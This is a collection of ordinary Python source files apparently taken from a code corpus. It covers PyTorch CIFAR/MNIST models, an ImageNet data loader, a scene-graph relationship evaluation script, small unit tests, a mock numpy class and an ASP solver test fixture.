name='pico_sdk',
version='0.1.4',
author='Meaty Solutions',
author_email='[email protected]',
description='High performance, gap-free streaming from any Pico Technology oscilloscope',
long_description=long_description,
long_description_content_type='text/markdown',
url='https://github.com/meatysolutions/pico-sdk-bindings',
package_data={'': ['artifacts/*', 'artifacts/*/*']},
packages=setuptools.find_packages(),
install_requires=['numpy'],
classifiers=[
'Programming Language :: Python :: 3',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
],
python_requires='>=3.6',
)
|
py | 1a37f18baa9025c9f62a64f4bd3224ae33f0e4d4 | import torch
import torch.nn as nn
def standardize(x, bn_stats):
if bn_stats is None:
return x
bn_mean, bn_var = bn_stats
view = [1] * len(x.shape)
view[1] = -1
x = (x - bn_mean.view(view)) / torch.sqrt(bn_var.view(view) + 1e-5)
    # zero out channels whose variance is exactly zero (their values are meaningless)
x *= (bn_var.view(view) != 0).float()
return x
def clip_data(data, max_norm):
norms = torch.norm(data.reshape(data.shape[0], -1), dim=-1)
scale = (max_norm / norms).clamp(max=1.0)
data *= scale.reshape(-1, 1, 1, 1)
return data
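# Minimal usage sketch (added for illustration; shapes are assumptions):
#   batch = torch.randn(8, 3, 32, 32)
#   clipped = clip_data(batch.clone(), max_norm=1.0)  # note: clip_data scales in place
#   torch.norm(clipped.reshape(8, -1), dim=-1).max()  # at most 1.0, up to float rounding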
def get_num_params(model):
return sum(p.numel() for p in model.parameters() if p.requires_grad)
class StandardizeLayer(nn.Module):
def __init__(self, bn_stats):
super(StandardizeLayer, self).__init__()
self.bn_stats = bn_stats
def forward(self, x):
return standardize(x, self.bn_stats)
class ClipLayer(nn.Module):
def __init__(self, max_norm):
super(ClipLayer, self).__init__()
self.max_norm = max_norm
def forward(self, x):
return clip_data(x, self.max_norm)
class CIFAR10_CNN(nn.Module):
def __init__(self, in_channels=3, input_norm=None, **kwargs):
super(CIFAR10_CNN, self).__init__()
self.in_channels = in_channels
self.features = None
self.classifier = None
self.norm = None
self.build(input_norm, **kwargs)
def build(self, input_norm=None, num_groups=None,
bn_stats=None, size=None):
if self.in_channels == 3:
if size == "small":
cfg = [16, 16, 'M', 32, 32, 'M', 64, 'M']
else:
cfg = [32, 32, 'M', 64, 64, 'M', 128, 128, 'M']
self.norm = nn.Identity()
else:
if size == "small":
cfg = [16, 16, 'M', 32, 32]
else:
cfg = [64, 'M', 64]
if input_norm is None:
self.norm = nn.Identity()
elif input_norm == "GroupNorm":
self.norm = nn.GroupNorm(num_groups, self.in_channels, affine=False)
else:
self.norm = lambda x: standardize(x, bn_stats)
layers = []
act = nn.Tanh
c = self.in_channels
for v in cfg:
if v == 'M':
layers += [nn.MaxPool2d(kernel_size=2, stride=2)]
else:
conv2d = nn.Conv2d(c, v, kernel_size=3, stride=1, padding=1)
layers += [conv2d, act()]
c = v
self.features = nn.Sequential(*layers)
if self.in_channels == 3:
hidden = 128
self.classifier = nn.Sequential(nn.Linear(c * 4 * 4, hidden), act(), nn.Linear(hidden, 10))
else:
self.classifier = nn.Linear(c * 4 * 4, 10)
def forward(self, x):
if self.in_channels != 3:
x = self.norm(x.view(-1, self.in_channels, 8, 8))
x = self.features(x)
x = x.view(x.size(0), -1)
x = self.classifier(x)
return x
class MNIST_CNN(nn.Module):
def __init__(self, in_channels=1, input_norm=None, **kwargs):
super(MNIST_CNN, self).__init__()
self.in_channels = in_channels
self.features = None
self.classifier = None
self.norm = None
self.build(input_norm, **kwargs)
def build(self, input_norm=None, num_groups=None,
bn_stats=None, size=None):
if self.in_channels == 1:
ch1, ch2 = (16, 32) if size is None else (32, 64)
cfg = [(ch1, 8, 2, 2), 'M', (ch2, 4, 2, 0), 'M']
self.norm = nn.Identity()
else:
ch1, ch2 = (16, 32) if size is None else (32, 64)
cfg = [(ch1, 3, 2, 1), (ch2, 3, 1, 1)]
if input_norm == "GroupNorm":
self.norm = nn.GroupNorm(num_groups, self.in_channels, affine=False)
elif input_norm == "BN":
self.norm = lambda x: standardize(x, bn_stats)
else:
self.norm = nn.Identity()
layers = []
c = self.in_channels
for v in cfg:
if v == 'M':
layers += [nn.MaxPool2d(kernel_size=2, stride=1)]
else:
filters, k_size, stride, pad = v
conv2d = nn.Conv2d(c, filters, kernel_size=k_size, stride=stride, padding=pad)
layers += [conv2d, nn.Tanh()]
c = filters
self.features = nn.Sequential(*layers)
hidden = 32
self.classifier = nn.Sequential(nn.Linear(c * 4 * 4, hidden),
nn.Tanh(),
nn.Linear(hidden, 10))
def forward(self, x):
if self.in_channels != 1:
x = self.norm(x.view(-1, self.in_channels, 7, 7))
x = self.features(x)
x = x.view(x.size(0), -1)
x = self.classifier(x)
return x
class ScatterLinear(nn.Module):
def __init__(self, in_channels, hw_dims, input_norm=None, classes=10, clip_norm=None, **kwargs):
super(ScatterLinear, self).__init__()
self.K = in_channels
self.h = hw_dims[0]
self.w = hw_dims[1]
self.fc = None
self.norm = None
self.clip = None
self.build(input_norm, classes=classes, clip_norm=clip_norm, **kwargs)
def build(self, input_norm=None, num_groups=None, bn_stats=None, clip_norm=None, classes=10):
self.fc = nn.Linear(self.K * self.h * self.w, classes)
if input_norm is None:
self.norm = nn.Identity()
elif input_norm == "GroupNorm":
self.norm = nn.GroupNorm(num_groups, self.K, affine=False)
else:
self.norm = lambda x: standardize(x, bn_stats)
if clip_norm is None:
self.clip = nn.Identity()
else:
self.clip = ClipLayer(clip_norm)
def forward(self, x):
x = self.norm(x.view(-1, self.K, self.h, self.w))
x = self.clip(x)
x = x.reshape(x.size(0), -1)
x = self.fc(x)
return x
CNNS = {
"cifar10": CIFAR10_CNN,
"fmnist": MNIST_CNN,
"mnist": MNIST_CNN,
}
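if __name__ == "__main__":
    # Minimal usage sketch (added for illustration; shapes and kwargs are
    # assumptions, not part of the original training pipeline):
    model = CNNS["cifar10"](in_channels=3, input_norm=None, size=None)
    dummy = torch.randn(4, 3, 32, 32)
    print(model(dummy).shape)  # torch.Size([4, 10])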
|
py | 1a37f20196433205d1377cce21427660caa6c75c | """
Tests for region-proposal generation via connected components.
"""
import pytest
from ingest.process.proposals.connected_components import get_proposals
import io
from PIL import Image
def test_num_objs():
with open('/ingestion/tests/images/pages-43707.bytes', 'rb') as rf:
b = rf.read()
img = Image.open(io.BytesIO(b)).convert('RGB')
proposals = get_proposals(img)
num_objs = len(proposals)
assert num_objs < 10
with open('/ingestion/tests/images/pages-956.bytes', 'rb') as rf:
b = rf.read()
img = Image.open(io.BytesIO(b)).convert('RGB')
proposals = get_proposals(img)
num_objs = len(proposals)
assert num_objs < 10
def test_no_tiny_objs():
with open('/ingestion/tests/images/pages-43707.bytes', 'rb') as rf:
b = rf.read()
img = Image.open(io.BytesIO(b)).convert('RGB')
proposals = get_proposals(img)
num_objs = len(proposals)
for proposal in proposals:
w = proposal[2] - proposal[0]
h = proposal[3] - proposal[1]
            assert h >= 40 and w >= 50
|
py | 1a37f20c8a04df6d7e757f41e76e5ab1f327b260 | import math
def test_factorial_digit_sum():
assert factorial_digit_sum(10) == 27
def factorial_digit_sum(n):
n_factorial_iterable = str(math.factorial(n))
digits_in_n_factorial = [int(i) for i in n_factorial_iterable]
return sum(digits_in_n_factorial)
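# Worked example (added for illustration): math.factorial(10) == 3628800 and
# 3 + 6 + 2 + 8 + 8 + 0 + 0 == 27, matching the assertion above.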
|
py | 1a37f2bd5fe18531b4032a37a702ab6810656fed | """Provide mock structures used accross the tests."""
from typing import List, Union
class NumpyArray:
"""Represent a class that mocks a numpy.array and it's behavior on less-then operator."""
def __init__(self, values: List[Union[int, bool]]) -> None:
"""Initialize with the given values."""
self.values = values
def __lt__(self, other: int) -> 'NumpyArray':
"""Map the value to each comparison with ``other``."""
return NumpyArray(values=[value < other for value in self.values])
def __gt__(self, other: int) -> 'NumpyArray':
"""Map the value to each comparison with ``other``."""
return NumpyArray(values=[value > other for value in self.values])
def __bool__(self) -> bool:
"""Raise a ValueError."""
raise ValueError("The truth value of an array with more than one element is ambiguous.")
def all(self) -> bool:
"""Return True if all values are True."""
return all(self.values)
def __repr__(self) -> str:
"""Represent with the constructor."""
return 'NumpyArray({!r})'.format(self.values)
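if __name__ == '__main__':
    # Minimal usage sketch (added for illustration):
    arr = NumpyArray([1, 2, 3])
    assert (arr < 4).all()
    try:
        bool(arr < 4)
    except ValueError as error:
        print(error)  # mimics numpy's "truth value ... is ambiguous" error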
|
py | 1a37f2ca6575335359a6db14eabd26c706ce77b7 | # python3
# Copyright 2020 DeepMind Technologies Limited. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""ImageNet dataset with typical pre-processing."""
import enum
from typing import Generator, Mapping, Optional, Sequence, Text, Tuple
import jax
import numpy as np
import tensorflow.compat.v2 as tf
import tensorflow_datasets as tfds
Batch = Mapping[Text, np.ndarray]
MEAN_RGB = (0.485 * 255, 0.456 * 255, 0.406 * 255)
STDDEV_RGB = (0.229 * 255, 0.224 * 255, 0.225 * 255)
class Split(enum.Enum):
"""Imagenet dataset split."""
TRAIN = 1
TRAIN_AND_VALID = 2
VALID = 3
TEST = 4
@classmethod
def from_string(cls, name: Text) -> 'Split':
return {'TRAIN': Split.TRAIN, 'TRAIN_AND_VALID': Split.TRAIN_AND_VALID,
'VALID': Split.VALID, 'VALIDATION': Split.VALID,
'TEST': Split.TEST}[name.upper()]
@property
def num_examples(self):
return {Split.TRAIN_AND_VALID: 1281167, Split.TRAIN: 1271167,
Split.VALID: 10000, Split.TEST: 50000}[self]
def load(
split: Split,
*,
is_training: bool,
batch_dims: Sequence[int],
bfloat16: bool = False,
) -> Generator[Batch, None, None]:
"""Loads the given split of the dataset."""
if is_training:
start, end = _shard(split, jax.host_id(), jax.host_count())
else:
start, end = _shard(split, 0, 1)
tfds_split = tfds.core.ReadInstruction(_to_tfds_split(split),
from_=start, to=end, unit='abs')
ds = tfds.load('imagenet2012:5.*.*', split=tfds_split,
decoders={'image': tfds.decode.SkipDecoding()})
total_batch_size = np.prod(batch_dims)
options = ds.options()
options.experimental_threading.private_threadpool_size = 48
options.experimental_threading.max_intra_op_parallelism = 1
if is_training:
options.experimental_deterministic = False
if is_training:
if jax.host_count() > 1:
# Only cache if we are reading a subset of the dataset.
ds = ds.cache()
ds = ds.repeat()
ds = ds.shuffle(buffer_size=10 * total_batch_size, seed=0)
else:
if split.num_examples % total_batch_size != 0:
      raise ValueError(f'Test/valid split size must be divisible by {total_batch_size}')
def preprocess(example):
image = _preprocess_image(example['image'], is_training)
if bfloat16:
image = tf.cast(image, tf.bfloat16)
label = tf.cast(example['label'], tf.int32)
return {'images': image, 'labels': label}
ds = ds.map(preprocess, num_parallel_calls=tf.data.experimental.AUTOTUNE)
for batch_size in reversed(batch_dims):
ds = ds.batch(batch_size)
ds = ds.prefetch(tf.data.experimental.AUTOTUNE)
yield from tfds.as_numpy(ds)
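# Minimal usage sketch (added for illustration; batch sizes are assumptions):
#   for batch in load(Split.from_string('TRAIN'), is_training=True,
#                     batch_dims=[jax.local_device_count(), 32]):
#     images = batch['images']  # (num_devices, 32, 224, 224, 3)
#     labels = batch['labels']  # (num_devices, 32)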
def _to_tfds_split(split: Split) -> tfds.Split:
"""Returns the TFDS split appropriately sharded."""
# NOTE: Imagenet did not release labels for the test split used in the
# competition, so it has been typical at DeepMind to consider the VALID
# split the TEST split and to reserve 10k images from TRAIN for VALID.
if split in (Split.TRAIN, Split.TRAIN_AND_VALID, Split.VALID):
return tfds.Split.TRAIN
else:
assert split == Split.TEST
return tfds.Split.VALIDATION
def _shard(split: Split, shard_index: int, num_shards: int) -> Tuple[int, int]:
"""Returns [start, end) for the given shard index."""
assert shard_index < num_shards
arange = np.arange(split.num_examples)
shard_range = np.array_split(arange, num_shards)[shard_index]
start, end = shard_range[0], (shard_range[-1] + 1)
if split == Split.TRAIN:
# Note that our TRAIN=TFDS_TRAIN[10000:] and VALID=TFDS_TRAIN[:10000].
offset = Split.VALID.num_examples
start += offset
end += offset
return start, end
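# Worked example (added for illustration): sharding Split.TRAIN (1271167
# examples) across 4 hosts gives host 0 the half-open range [0, 317792);
# the 10000-example VALID offset then maps it to [10000, 327792) within the
# underlying TFDS TRAIN split.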
def _preprocess_image(
image_bytes: tf.Tensor,
is_training: bool,
) -> tf.Tensor:
"""Returns processed and resized images."""
if is_training:
image = _decode_and_random_crop(image_bytes)
image = tf.image.random_flip_left_right(image)
else:
image = _decode_and_center_crop(image_bytes)
assert image.dtype == tf.uint8
# NOTE: Bicubic resize (1) casts uint8 to float32 and (2) resizes without
# clamping overshoots. This means values returned will be outside the range
# [0.0, 255.0] (e.g. we have observed outputs in the range [-51.1, 336.6]).
image = tf.image.resize(image, [224, 224], tf.image.ResizeMethod.BICUBIC)
image = _normalize_image(image)
return image
def _normalize_image(image: tf.Tensor) -> tf.Tensor:
"""Normalize the image to zero mean and unit variance."""
image -= tf.constant(MEAN_RGB, shape=[1, 1, 3], dtype=image.dtype)
image /= tf.constant(STDDEV_RGB, shape=[1, 1, 3], dtype=image.dtype)
return image
def _distorted_bounding_box_crop(
image_bytes: tf.Tensor,
*,
jpeg_shape: tf.Tensor,
bbox: tf.Tensor,
min_object_covered: float,
aspect_ratio_range: Tuple[float, float],
area_range: Tuple[float, float],
max_attempts: int,
) -> tf.Tensor:
"""Generates cropped_image using one of the bboxes randomly distorted."""
bbox_begin, bbox_size, _ = tf.image.sample_distorted_bounding_box(
jpeg_shape,
bounding_boxes=bbox,
min_object_covered=min_object_covered,
aspect_ratio_range=aspect_ratio_range,
area_range=area_range,
max_attempts=max_attempts,
use_image_if_no_bounding_boxes=True)
# Crop the image to the specified bounding box.
offset_y, offset_x, _ = tf.unstack(bbox_begin)
target_height, target_width, _ = tf.unstack(bbox_size)
crop_window = tf.stack([offset_y, offset_x, target_height, target_width])
image = tf.image.decode_and_crop_jpeg(image_bytes, crop_window, channels=3)
return image
def _decode_and_random_crop(image_bytes: tf.Tensor) -> tf.Tensor:
"""Make a random crop of 224."""
jpeg_shape = tf.image.extract_jpeg_shape(image_bytes)
bbox = tf.constant([0.0, 0.0, 1.0, 1.0], dtype=tf.float32, shape=[1, 1, 4])
image = _distorted_bounding_box_crop(
image_bytes,
jpeg_shape=jpeg_shape,
bbox=bbox,
min_object_covered=0.1,
aspect_ratio_range=(3 / 4, 4 / 3),
area_range=(0.08, 1.0),
max_attempts=10)
if tf.reduce_all(tf.equal(jpeg_shape, tf.shape(image))):
# If the random crop failed fall back to center crop.
image = _decode_and_center_crop(image_bytes, jpeg_shape)
return image
def _decode_and_center_crop(
image_bytes: tf.Tensor,
jpeg_shape: Optional[tf.Tensor] = None,
) -> tf.Tensor:
"""Crops to center of image with padding then scales."""
if jpeg_shape is None:
jpeg_shape = tf.image.extract_jpeg_shape(image_bytes)
image_height = jpeg_shape[0]
image_width = jpeg_shape[1]
padded_center_crop_size = tf.cast(
((224 / (224 + 32)) *
tf.cast(tf.minimum(image_height, image_width), tf.float32)), tf.int32)
offset_height = ((image_height - padded_center_crop_size) + 1) // 2
offset_width = ((image_width - padded_center_crop_size) + 1) // 2
crop_window = tf.stack([offset_height, offset_width,
padded_center_crop_size, padded_center_crop_size])
image = tf.image.decode_and_crop_jpeg(image_bytes, crop_window, channels=3)
return image
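# Worked example (added for illustration): for a 500x375 JPEG,
# padded_center_crop_size = int((224 / 256) * 375) = 328, so
# offset_height = (375 - 328 + 1) // 2 = 24 and
# offset_width = (500 - 328 + 1) // 2 = 86, ahead of the bicubic resize to
# 224x224 performed in _preprocess_image.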
|
py | 1a37f38252d2e5fc8f95826709a5740c12b529f9 | """Perform inference on one or more datasets."""
import argparse
import cv2
import os
import pprint
import sys
import time
from six.moves import cPickle as pickle
import torch
import _init_paths # pylint: disable=unused-import
from core.config import cfg, merge_cfg_from_file, merge_cfg_from_list, assert_and_infer_cfg
#from core.test_engine_rel import run_inference, get_features_for_centroids
import utils.logging
from datasets import task_evaluation_rel as task_evaluation
from evaluation.generate_detections_csv import generate_csv_file_from_det_obj, generate_topk_csv_from_det_obj, generate_boxes_csv_from_det_obj
from evaluation.frequency_based_analysis_of_methods import get_metrics_from_csv, get_many_medium_few_scores, get_wordsim_metrics_from_csv
import numpy as np
import json
# OpenCL may be enabled by default in OpenCV3; disable it because it's not
# thread safe and causes unwanted GPU memory allocations.
cv2.ocl.setUseOpenCL(False)
def parse_args():
"""Parse in command line arguments"""
parser = argparse.ArgumentParser(description='Test a Fast R-CNN network')
parser.add_argument(
'--dataset',
help='training dataset')
parser.add_argument(
'--cfg', dest='cfg_file', required=True,
help='optional config file')
parser.add_argument(
'--load_ckpt', help='path of checkpoint to load')
parser.add_argument(
'--load_detectron', help='path to the detectron weight pickle file')
parser.add_argument(
'--output_dir',
help='output directory to save the testing results. If not provided, '
'defaults to [args.load_ckpt|args.load_detectron]/../test.')
parser.add_argument(
'--set', dest='set_cfgs',
help='set config keys, will overwrite config in the cfg_file.'
' See lib/core/config.py for all options',
default=[], nargs='*')
parser.add_argument(
'--range',
help='start (inclusive) and end (exclusive) indices',
type=int, nargs=2)
parser.add_argument(
'--multi-gpu-testing', help='using multiple gpus for inference',
action='store_true')
parser.add_argument(
'--vis', dest='vis', help='visualize detections', action='store_true')
parser.add_argument(
'--do_val', dest='do_val', help='do evaluation', action='store_true')
parser.add_argument(
'--use_gt_boxes', dest='use_gt_boxes', help='use gt boxes for sgcls/prdcls', action='store_true')
parser.add_argument(
        '--use_gt_labels', dest='use_gt_labels', help='use gt labels for sgcls/prdcls', action='store_true')
parser.add_argument(
'--cutoff_medium', dest='cutoff_medium', help='ratio of medium classes', type=float, default=0.80)
parser.add_argument(
'--cutoff_many', dest='cutoff_many', help='ratio of many classes', type=float, default=0.95)
parser.add_argument(
'--seed', dest='seed',
help='Value of seed here will overwrite seed in cfg file',
type=int)
return parser.parse_args()
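# Example invocation (added for illustration; the script name and config/checkpoint
# paths are hypothetical, the flags are defined above):
#   python test_net_rel.py --dataset gvqa --cfg configs/gvqa/baseline.yaml \
#       --load_ckpt Outputs/gvqa/model_final.pth --do_val --use_gt_boxes --use_gt_labels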
def get_obj_and_prd_categories():
from datasets.dataset_catalog_rel import ANN_FN3
from datasets.dataset_catalog_rel import DATASETS
predicates_path = DATASETS[cfg.TEST.DATASETS[0]][ANN_FN3]
objects_path = DATASETS[cfg.TEST.DATASETS[0]][ANN_FN3].replace('predicates', 'objects', 1)
logger.info('Loading predicates from: ' + predicates_path)
logger.info('Loading objects from: ' + objects_path)
with open(predicates_path) as f:
prd_categories = json.load(f)
with open(objects_path) as f:
obj_categories = json.load(f)
return obj_categories, prd_categories
def get_obj_and_prd_frequencies():
if cfg.DATASET == 'gvqa10k':
freq_prd_path = cfg.DATA_DIR + '/gvqa/reduced_data/10k/seed{}/predicates_freqs.json'.format(
cfg.RNG_SEED)
freq_obj_path = cfg.DATA_DIR + '/gvqa/reduced_data/10k/seed{}/objects_freqs.json'.format(
cfg.RNG_SEED)
elif cfg.DATASET == 'gvqa20k':
freq_prd_path = cfg.DATA_DIR + '/gvqa/reduced_data/20k/seed{}/predicates_freqs.json'.format(
cfg.RNG_SEED)
freq_obj_path = cfg.DATA_DIR + '/gvqa/reduced_data/20k/seed{}/objects_freqs.json'.format(
cfg.RNG_SEED)
elif cfg.DATASET == 'gvqa':
freq_prd_path = cfg.DATA_DIR + '/gvqa/seed{}/predicates_freqs.json'.format(
cfg.RNG_SEED)
freq_obj_path = cfg.DATA_DIR + '/gvqa/seed{}/objects_freqs.json'.format(
cfg.RNG_SEED)
elif cfg.DATASET == 'vg80k':
freq_prd_path = cfg.DATA_DIR + '/vg/predicates_freqs.json'
freq_obj_path = cfg.DATA_DIR + '/vg/objects_freqs.json'
elif cfg.DATASET == 'vg8k':
freq_prd_path = cfg.DATA_DIR + '/vg8k/seed{}/train_predicates_freqs.json'.format(
cfg.RNG_SEED)
freq_obj_path = cfg.DATA_DIR + '/vg8k/seed{}/train_objects_freqs.json'.format(
cfg.RNG_SEED)
else:
raise NotImplementedError
logger.info('Loading predicates frequencies from: ' + freq_prd_path)
logger.info('Loading objects frequencies from: ' + freq_obj_path)
prd_freq_dict = json.load(open(freq_prd_path))
obj_freq_dict = json.load(open(freq_obj_path))
return obj_freq_dict, prd_freq_dict
if __name__ == '__main__':
logger = utils.logging.setup_logging(__name__)
args = parse_args()
logger.info('Called with args:')
logger.info(args)
cfg.VIS = args.vis
if args.cfg_file is not None:
merge_cfg_from_file(args.cfg_file)
if args.set_cfgs is not None:
merge_cfg_from_list(args.set_cfgs)
cfg.DATASET = args.dataset
if args.dataset == "vrd":
cfg.TEST.DATASETS = ('vrd_val',)
cfg.MODEL.NUM_CLASSES = 101
cfg.MODEL.NUM_PRD_CLASSES = 70 # exclude background
elif args.dataset == "vg":
cfg.TEST.DATASETS = ('vg_val',)
cfg.MODEL.NUM_CLASSES = 151
cfg.MODEL.NUM_PRD_CLASSES = 50 # exclude background
elif args.dataset == "vg80k":
cfg.TEST.DATASETS = ('vg80k_test',)
cfg.MODEL.NUM_CLASSES = 53305 # includes background
cfg.MODEL.NUM_PRD_CLASSES = 29086 # excludes background
elif args.dataset == "vg8k":
cfg.TEST.DATASETS = ('vg8k_test',)
cfg.MODEL.NUM_CLASSES = 5331 # includes background
cfg.MODEL.NUM_PRD_CLASSES = 2000 # excludes background
elif args.dataset == "gvqa20k":
cfg.TEST.DATASETS = ('gvqa20k_test',)
cfg.MODEL.NUM_CLASSES = 1704 # includes background
cfg.MODEL.NUM_PRD_CLASSES = 310 # exclude background
elif args.dataset == "gvqa10k":
cfg.TEST.DATASETS = ('gvqa10k_test',)
cfg.MODEL.NUM_CLASSES = 1704 # includes background
cfg.MODEL.NUM_PRD_CLASSES = 310 # exclude background
elif args.dataset == "gvqa":
cfg.TEST.DATASETS = ('gvqa_test',)
cfg.MODEL.NUM_CLASSES = 1704 # includes background
cfg.MODEL.NUM_PRD_CLASSES = 310 # exclude background
else: # For subprocess call
assert cfg.TEST.DATASETS, 'cfg.TEST.DATASETS shouldn\'t be empty'
if args.seed:
cfg.RNG_SEED = args.seed
assert_and_infer_cfg()
data_dir = '{}/{}/'.format(cfg.DATA_DIR, cfg.DATASET)
ann_dir = '{}seed{}/'.format(data_dir, cfg.RNG_SEED)
# The import has to happen after setting up the config to avoid loading default cfg values
from core.test_engine_rel import run_inference
obj_categories, prd_categories = get_obj_and_prd_categories()
obj_freq_dict, prd_freq_dict = get_obj_and_prd_frequencies()
if not cfg.MODEL.RUN_BASELINE:
assert bool(args.load_ckpt) ^ bool(args.load_detectron), \
'Exactly one of --load_ckpt and --load_detectron should be specified.'
if args.output_dir is None:
ckpt_path = args.load_ckpt if args.load_ckpt else args.load_detectron
args.output_dir = os.path.join(
os.path.dirname(os.path.dirname(ckpt_path)), 'test')
logger.info('Automatically set output directory to %s', args.output_dir)
if not os.path.exists(args.output_dir):
os.makedirs(args.output_dir)
logger.info('Testing with config:')
logger.info(pprint.pformat(cfg))
# For test_engine.multi_gpu_test_net_on_dataset
args.test_net_file, _ = os.path.splitext(__file__)
# manually set args.cuda
args.cuda = True
#print('Generating Centroids')
#all_results = get_features_for_centroids(args)
#print('Done!')
if args.use_gt_boxes:
if args.use_gt_labels:
det_file = os.path.join(args.output_dir, 'rel_detections_gt_boxes_prdcls.pkl')
csv_file = os.path.join(args.output_dir, 'rel_detections_gt_boxes_prdcls.csv')
else:
det_file = os.path.join(args.output_dir, 'rel_detections_gt_boxes_sgcls.pkl')
csv_file = os.path.join(args.output_dir, 'rel_detections_gt_boxes_sgcls.csv')
else:
det_file = os.path.join(args.output_dir, 'rel_detections.pkl')
csv_file = os.path.join(args.output_dir, 'rel_detections.csv')
if os.path.exists(det_file):
logger.info('Loading results from {}'.format(det_file))
with open(det_file, 'rb') as f:
all_results = pickle.load(f)
# logger.info('Starting evaluation now...')
# task_evaluation.eval_rel_results(all_results, args.output_dir, args.do_val)
else:
if not torch.cuda.is_available():
sys.exit("Need a CUDA device to run the code.")
assert (torch.cuda.device_count() == 1) ^ bool(args.multi_gpu_testing)
all_results = run_inference(
args,
ind_range=args.range,
multi_gpu_testing=args.multi_gpu_testing,
check_expected_results=True)
all_results = all_results[0]
    freq_prd = np.zeros(cfg.MODEL.NUM_PRD_CLASSES)
    freq_obj = np.zeros(cfg.MODEL.NUM_CLASSES)
generate_csv_file_from_det_obj(all_results, csv_file, obj_categories, prd_categories, obj_freq_dict, prd_freq_dict)
logger.info('Saved CSV to: ' + csv_file)
get_metrics_from_csv(csv_file, get_mr=True)
cutoffs = [args.cutoff_medium, args.cutoff_many]
get_many_medium_few_scores(csv_file, cutoffs, cfg.DATASET, data_dir, ann_dir, syn=True)
csv_file_topk = os.path.join(os.path.dirname(csv_file), 'rel_detections_gt_boxes_prdcls_topk.csv')
generate_topk_csv_from_det_obj(all_results, csv_file_topk, obj_categories, prd_categories, 250)
logger.info('Saved topk CSV to: ' + csv_file_topk)
csv_file_boxes = os.path.join(os.path.dirname(csv_file), 'rel_detections_gt_boxes_prdcls_boxes.csv')
generate_boxes_csv_from_det_obj(all_results, csv_file_boxes, obj_categories, prd_categories, obj_freq_dict, prd_freq_dict)
logger.info('Saved boxes CSV to: ' + csv_file_boxes)
if cfg.DATASET.find('gvqa') >= 0:
from evaluation.add_word_similarity_to_csv import add_similarity_to_detections
logger.info('Adding word similarity to CSV')
add_similarity_to_detections(csv_file)
csv_file_w = os.path.join(os.path.dirname(csv_file), 'rel_detections_gt_boxes_prdcls_wrd_sim.csv')
get_wordsim_metrics_from_csv(csv_file_w)
|
py | 1a37f41782ff501211e43e37001075e56170824e | input = """
1 2 0 0
1 3 0 0
1 4 0 0
1 5 0 0
1 6 0 0
1 7 0 0
1 8 0 0
1 9 0 0
1 10 0 0
1 11 0 0
1 12 2 1 13 14
1 13 2 1 12 14
1 14 0 0
1 15 2 1 16 17
1 16 2 1 15 17
1 17 0 0
1 18 2 1 19 20
1 19 2 1 18 20
1 20 0 0
1 21 2 1 22 23
1 22 2 1 21 23
1 23 0 0
1 24 2 1 25 26
1 25 2 1 24 26
1 26 0 0
1 27 2 1 28 29
1 28 2 1 27 29
1 29 0 0
1 30 2 1 31 32
1 31 2 1 30 32
1 32 0 0
1 33 2 1 34 35
1 34 2 1 33 35
1 35 0 0
1 36 2 1 37 38
1 37 2 1 36 38
1 38 0 0
1 39 2 1 40 41
1 40 2 1 39 41
1 41 0 0
2 42 10 0 5 39 36 33 30 27 24 21 18 15 12
1 1 1 1 42
2 43 10 0 5 40 37 34 31 28 25 22 19 16 13
1 1 1 1 43
0
12 a(10)
15 a(9)
18 a(8)
21 a(7)
24 a(6)
27 a(5)
30 a(4)
33 a(3)
36 a(2)
39 a(1)
13 b(10)
16 b(9)
19 b(8)
22 b(7)
25 b(6)
28 b(5)
31 b(4)
34 b(3)
37 b(2)
40 b(1)
2 c(1)
3 c(2)
4 c(3)
5 c(4)
6 c(5)
7 c(6)
8 c(7)
9 c(8)
10 c(9)
11 c(10)
0
B+
0
B-
1
0
1
"""
output = """
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), a(9), a(8), a(7), a(6), b(5), b(4), b(3), b(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), a(9), a(8), a(7), b(6), a(5), b(4), b(3), b(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), a(9), a(8), a(7), b(6), b(5), a(4), b(3), b(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), a(9), a(8), a(7), b(6), b(5), b(4), a(3), b(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), a(9), a(8), a(7), b(6), b(5), b(4), b(3), a(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), a(9), a(8), a(7), b(6), b(5), b(4), b(3), b(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), a(9), a(8), b(7), a(6), a(5), b(4), b(3), b(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), a(9), a(8), b(7), a(6), b(5), a(4), b(3), b(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), a(9), a(8), b(7), a(6), b(5), b(4), a(3), b(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), a(9), a(8), b(7), a(6), b(5), b(4), b(3), a(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), a(9), a(8), b(7), a(6), b(5), b(4), b(3), b(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), a(9), a(8), b(7), b(6), a(5), a(4), b(3), b(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), a(9), a(8), b(7), b(6), a(5), b(4), a(3), b(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), a(9), a(8), b(7), b(6), a(5), b(4), b(3), a(2), b(1)}
